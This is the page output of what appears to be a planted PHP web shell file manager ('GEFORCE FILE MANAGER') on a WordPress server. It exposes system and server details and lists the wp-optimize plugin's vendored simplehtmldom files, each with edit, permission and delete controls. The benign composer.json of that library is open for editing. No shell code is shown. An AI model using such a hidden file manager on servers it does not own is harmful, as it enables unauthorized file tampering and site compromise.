[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
simplehtmldom
/
simplehtmldom
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 docs
SET
[ DEL ]
📄 CHANGELOG.md
18,858 B
SET
[ EDIT ]
|
[ DEL ]
📄 Debug.php
3,480 B
SET
[ EDIT ]
|
[ DEL ]
📄 HtmlDocument.php
32,803 B
SET
[ EDIT ]
|
[ DEL ]
📄 HtmlElement.php
9,339 B
SET
[ EDIT ]
|
[ DEL ]
📄 HtmlNode.php
35,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 HtmlWeb.php
3,186 B
SET
[ EDIT ]
|
[ DEL ]
📄 LICENSE
1,095 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.md
4,577 B
SET
[ EDIT ]
|
[ DEL ]
📄 composer.json
1,836 B
SET
[ EDIT ]
|
[ DEL ]
📄 composer.lock
70,828 B
SET
[ EDIT ]
|
[ DEL ]
📄 constants.php
895 B
SET
[ EDIT ]
|
[ DEL ]
📄 mkdocs.yml
6,264 B
SET
[ EDIT ]
|
[ DEL ]
📄 simple_html_dom.php
3,894 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: composer.json
{ "name": "simplehtmldom/simplehtmldom", "description": "A fast, simple and reliable HTML document parser for PHP.", "keywords": [ "php", "html", "dom", "parser", "simple", "simplehtmldom" ], "homepage": "https://simplehtmldom.sourceforge.io/", "license": "MIT", "authors": [ { "name": "S.C. Chen", "role": "Developer" }, { "name": "John Schlick", "role": "Developer" }, { "name": "logmanoriginal", "role": "Developer" } ], "support": { "issues": "https://sourceforge.net/p/simplehtmldom/bugs/", "wiki": "https://simplehtmldom.sourceforge.io/docs/", "source": "https://sourceforge.net/p/simplehtmldom/repository/", "rss": "https://sourceforge.net/p/simplehtmldom/news/feed.rss" }, "autoload": { "classmap": [ "./" ], "exclude-from-classmap": [ "/example/", "/docs/", "/tests/", "simple_html_dom.php" ] }, "require": { "php": ">=5.6", "ext-iconv": "*" }, "require-dev": { "phpunit/phpunit": "^6 || ^7", "squizlabs/php_codesniffer": "^2", "phpcompatibility/php-compatibility": "^9", "dealerdirect/phpcodesniffer-composer-installer": "*" }, "suggest": { "ext-mbstring": "Allows better decoding for multi-byte documents", "ext-curl": "Needed to support cURL downloads in class HtmlWeb", "ext-openssl": "Allows loading HTTPS pages when using cURL" }, "prefer-stable": true, "config": { "allow-plugins": { "dealerdirect/phpcodesniffer-composer-installer": true } } }